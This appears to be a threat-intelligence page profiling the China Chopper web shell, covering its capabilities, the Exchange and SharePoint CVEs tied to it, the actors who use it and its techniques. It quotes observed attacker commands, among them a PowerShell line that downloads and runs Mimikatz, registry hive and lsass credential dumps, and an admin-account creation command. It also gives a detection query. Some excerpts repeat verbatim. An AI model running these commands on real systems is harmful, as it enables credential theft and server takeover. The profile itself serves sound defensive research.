China Chopper is a compact web shell family first publicly identified in 2012 and widely used as a post-exploitation access mechanism on compromised web servers. It consists of a minimal server-side payload and a separate client-side controller, allowing operators to retain remote access, execute commands, manage files, and stage follow-on activity while blending into normal web traffic through HTTP POST-based communications. Variants have been observed in ASPX, JSP, PHP, and related server-side implementations, with the server component functioning as a web shell payload that evaluates attacker-supplied code delivered in web requests.
Core capabilities attributed to China Chopper include remote command execution, opening a Windows command shell, uploading files from the compromised host, downloading additional tools to the host, listing directories, modifying file timestamps for anti-forensic purposes, brute-force password guessing against authentication portals, and spidering or probing authentication services. Operational reporting also shows it being used to execute PowerShell, deploy secondary payloads such as Cobalt Strike, archive and exfiltrate collected data, and support broader post-compromise activity including reconnaissance and lateral movement by human operators.
China Chopper has repeatedly appeared after exploitation of public-facing applications, especially Microsoft Exchange and SharePoint vulnerabilities. It was heavily used in campaigns exploiting ProxyLogon-era Exchange flaws, as well as CVE-2019-0604 in SharePoint and other internet-facing server compromises. Threat actors have used it to establish footholds on Exchange, IIS, Apache, and other web-accessible servers, sometimes deleting or replacing shells later to reduce forensic visibility or exclude competing intruders.
Use of China Chopper spans opportunistic criminal activity and state-linked espionage operations. It has been reported in activity associated with Chinese-aligned intrusion clusters and APT operations, including Soft Cell, Naikon-related activity, APT10-linked reporting, APT27-linked reporting, and broader China-nexus telecom and infrastructure targeting. It has also been used by financially motivated actors and malware operators such as LemonDuck, Prometei, and BlackKingdom following Exchange exploitation. Because the tool is widely available and simple to deploy, its presence alone is not sufficient for attribution.
Targeting associated with China Chopper has included government, telecommunications, finance, web hosting, industrial, and other enterprise environments. The malware is most strongly associated with Windows-based web server compromises, particularly IIS-hosted Exchange and SharePoint systems, though reporting also notes deployment on Apache and Java application environments through JSP variants. Its enduring utility comes from its small footprint, flexible command interface, and effectiveness as a lightweight server-resident backdoor for sustained access and follow-on intrusion operations.
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
16 CVEs Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
CVE-2021-26855: This allows an unauthenticated attacker to send arbitrary HTTP requests and authenticate as the Exchange Server. The vulnerability exploits the Exchange Control Panel (ECP) via server-side request forgery (SSRF). This would also allow the attacker to gain access to mailboxes and read sensitive information. This forms the “ProxyLogon” exploit when chained with CVE-2021-27065. | Two of the vulnerabilities (CVE-2021-26855 and CVE-2021-27065) and the technique used to chain them together for exploitation have been given the name “ProxyLogon” by security company DevCore. Successful exploitation of ProxyLogon allows attackers to gain a foothold on a targeted network, potentially leading to further compromise and data exfiltration. | Among the web shells Veloxity said it saw deployed were China Chopper variants and ASPXSPY.
CVE-2019-0604 Vulnerable Products: Microsoft SharePoint Associated Malware: China Chopper Mitigation: Update affected Microsoft products with the latest security patches | CVE-2019-0604 Vulnerable Products: Microsoft SharePoint Associated Malware: China Chopper
Microsoft Exchange Server ... China Chopper webshell was installed after above activities ... Exploiting ProxyShell vulnerability | China Chopper webshell was installed after above activities
the attackers exploited recently published Microsoft Exchange vulnerabilities (CVE-2021-27065 and CVE-2021-26858) in order to penetrate the network and install malware | The attackers used this vulnerability to install and execute the China Chopper webshell via the following commands.
The recently discovered and patched Microsoft Exchange vulnerabilities (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 and CVE-2021-27065) have garnered considerable attention due to their mass exploitation and the severity of impact each exploitation has on the affected organization. | While we did not have access to the supp0rt.aspx file used in this specific attack, we were able to analyze 177 supp0rt.aspx files that contained similar functionality. Each of the analyzed files contained China Chopper’s server-side JScript, which would evaluate code provided within a unique parameter whose name consists of 32 alphanumeric characters.
The recently discovered and patched Microsoft Exchange vulnerabilities (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 and CVE-2021-27065) have garnered considerable attention due to their mass exploitation and the severity of impact each exploitation has on the affected organization. | While we did not have access to the supp0rt.aspx file used in this specific attack, we were able to analyze 177 supp0rt.aspx files that contained similar functionality. Each of the analyzed files contained China Chopper’s server-side JScript, which would evaluate code provided within a unique parameter whose name consists of 32 alphanumeric characters.
China Chopper is a web shell that allows attackers to retain access to an infected system using a client side application which contains all the logic required to control the target.
The China Chopper actor activity starts with the download and execution of two exploit files which attempt to exploit the Windows vulnerabilities CVE-2015-0062, CVE-2015-1701 and CVE-2016-0099 to allow the attacker to modify other objects on the server. | China Chopper is a web shell that allows attackers to retain access to an infected system using a client side application which contains all the logic required to control the target.
The China Chopper actor activity starts with the download and execution of two exploit files which attempt to exploit the Windows vulnerabilities CVE-2015-0062, CVE-2015-1701 and CVE-2016-0099 to allow the attacker to modify other objects on the server. | China Chopper is a web shell that allows attackers to retain access to an infected system using a client side application which contains all the logic required to control the target.
The China Chopper actor activity starts with the download and execution of two exploit files which attempt to exploit the Windows vulnerabilities CVE-2015-0062, CVE-2015-1701 and CVE-2016-0099 to allow the attacker to modify other objects on the server. | China Chopper is a web shell that allows attackers to retain access to an infected system using a client side application which contains all the logic required to control the target.
CVE-2021-27857: Is an insecure deserialization vulnerability in the Unified Messaging service. An attacker, authenticated either by using CVE-2021-26855 or via stolen admin credentials, could execute arbitrary code as SYSTEM on the Exchange Server.
In our telemetry, we noticed exploitation attempts of several CVEs (CVE-2021-34473, CVE-2021-34523 and CVE-2021-31207 in Microsoft Exchange, CVE-2023-26360 in Adobe ColdFusion). Therefore, we believe with moderate confidence that these web shells were dropped by exploiting an existing unpatched vulnerability. According to our telemetry, the newly discovered web shell was also associated with a campaign leveraging CVE-2023-26360 early this year targeting vulnerable servers in the Middle East. | The infection came to our attention in June 2024, when our telemetry gave recurring alerts for a new China Chopper web shell variant... The resulting code resembles the known functionality associated with the China Chopper web shell, a popular web shell used by attackers for remote access and control over compromised web servers.
In our telemetry, we noticed exploitation attempts of several CVEs (CVE-2021-34473, CVE-2021-34523 and CVE-2021-31207 in Microsoft Exchange, CVE-2023-26360 in Adobe ColdFusion). Therefore, we believe with moderate confidence that these web shells were dropped by exploiting an existing unpatched vulnerability. | The infection came to our attention in June 2024, when our telemetry gave recurring alerts for a new China Chopper web shell variant... The resulting code resembles the known functionality associated with the China Chopper web shell, a popular web shell used by attackers for remote access and control over compromised web servers.
In our telemetry, we noticed exploitation attempts of several CVEs (CVE-2021-34473, CVE-2021-34523 and CVE-2021-31207 in Microsoft Exchange, CVE-2023-26360 in Adobe ColdFusion). Therefore, we believe with moderate confidence that these web shells were dropped by exploiting an existing unpatched vulnerability. | The infection came to our attention in June 2024, when our telemetry gave recurring alerts for a new China Chopper web shell variant... The resulting code resembles the known functionality associated with the China Chopper web shell, a popular web shell used by attackers for remote access and control over compromised web servers.
The threat actor primarily gained initial access by compromising a Citrix NetScaler remote access server using a publicly available exploit for CVE-2019-19781.
The threat actors then used BEHINDER to install the China Chopper web shell and a simple file upload tool as backups.
21 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
Initial access: The attackers deployed the following China Chopper, JspSpy webshells to obtain a foothold on the victim’s network that they used to execute commands to upload files to the target machines.
APT27 ... Examples of associated tools: ... China Chopper ... ; GALLIUM ... Examples of associated tools: PlugX, ChinaChopper...
This compromise led to the creation of multiple web shells, including simple China Chopper web shells.
China Chopper is a web shell that provides access back into the victim system and is used by several threat groups [23].
Among the web shells Veloxity said it saw deployed were China Chopper variants and ASPXSPY.
31 distinct techniques documented for this family, organized by ATT&CK tactic.
An arbitrary code execution vulnerability in Citrix VPN appliances, known as CVE-2019-19781, has been detected in exploits in the wild. An arbitrary file reading vulnerability in Pulse Secure VPN servers, known as CVE-2019-11510, continues to be an attractive target for malicious actors.
The China Chopper web shell has long been utilized post exploit to blend in network traffic, providing the attacker full command prompt access to move around the network.
event_log_source:'Security' AND event_id:'4688' AND proc_parent_file_path end with:'\w3wp.exe' AND proc_file_path end with:('\cmd.exe' OR '\powershell.exe')
The content repeatedly describes threat actors and malware using cmd.exe, the Windows command shell, to execute commands, launch payloads, run batch files, and automate actions on compromised hosts.
C:\windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe C:\windows\temp\Document.csproj /p:AssemblyName=C:\windows\temp\downloader.png /p:ScriptFile=C:\windows\temp\downloader.dat
U.S. Government reporting has identified the top 10 most exploited vulnerabilities by state, nonstate, and unattributed cyber actors from 2016 to 2019 as follows: CVE-2017-11882, CVE-2017-0199, CVE-2017-5638, CVE-2012-0158, CVE-2019-0604, CVE-2017-0143, CVE-2018-4878, CVE-2017-8759, CVE-2015-1641, and CVE-2018-7600.
the attackers seek to create a new user and then add the user to the group of users with administrative privileges... net user user pass /add
Dubex said the victims it investigated in January had a “web shell” backdoor installed... Trend Micro publishes a blog post about “China Chopper” web shells being dropped via Exchange flaws | Dubex said the victims it investigated in January had a “web shell” backdoor installed via the “unifying messaging” module
All parameters are encoded with a standard base64 encoder before submission.
The actors first reset the Access Control List for the Windows temporary files folder and take ownership of the folder... launches a few other tools to modify the access control lists (ACLs) of all websites running on the affected server. cacls \. C:\path_to_a_website /T /E /C /G Everyone:F
powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz | reg save hklm\sam sam.hive reg save hklm\system system.hive reg save hklm\security security.hive ... Invoke-Mimikatz ... The attackers also tried procdump64.exe on lsass.exe to get the local credentials stored in memory.
The following commands were observed on a PowerShell session obtained by the exploit ... ipconfig /all
the attackers used different built-in Windows tools such as net commands, queser, reg, systeminfo, tasklist, netstat, and ping for internal and external connectivity checks
Andariel has collected large numbers of files from compromised network systems for later extraction... APT28 has retrieved internal documents from machines inside victim environments... BADNEWS crawls the victim's local drives and collects documents... many listed groups and malware collect files, documents, credentials, payment card data, or other information from compromised hosts.
net use \\192.168.0.10\ipc$ /user:USER PASSWORD move c:\working_directory\db.csv \\192.168.0.10\destination_directory
The content is a long ATT&CK-style listing showing numerous malware families and threat groups that 'use HTTP,' 'use HTTPS,' 'HTTP POST requests,' 'HTTP GET requests,' or 'HTTP/S' for command and control communications. | Specific implementations mentioned include 'HTTP POST requests,' 'HTTP GET requests,' 'custom HTTP cookies,' 'Cookie HTTP header,' 'HTTP Upgrade request' for WebSocket initiation, and use of APIs such as 'Microsoft Graph API' or 'Dropbox HTTP API' for C2.
134 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
119 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
A webshell client/management tool associated with lightweight 'OneShell' server-side implants and widely used to operate compromised web servers.
A web shell/backdoor cited as a commonly reused tool in Chinese state-sponsored intrusions, especially relevant to external-facing server compromise.
The group uses a variety of TTPs including but not limited to LoTL tactics, phishing, ransomware, cryptocurrency mining, supply chain attacks, China Chopper, Gh0st RaT, PlugX, HighNoon, Derusbi, BioPass RAT, RedXOR, and ShadowPad.
A web shell/backdoor used to maintain persistent access on compromised web management interfaces and staging systems during lateral movement in the telecom intrusions described.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.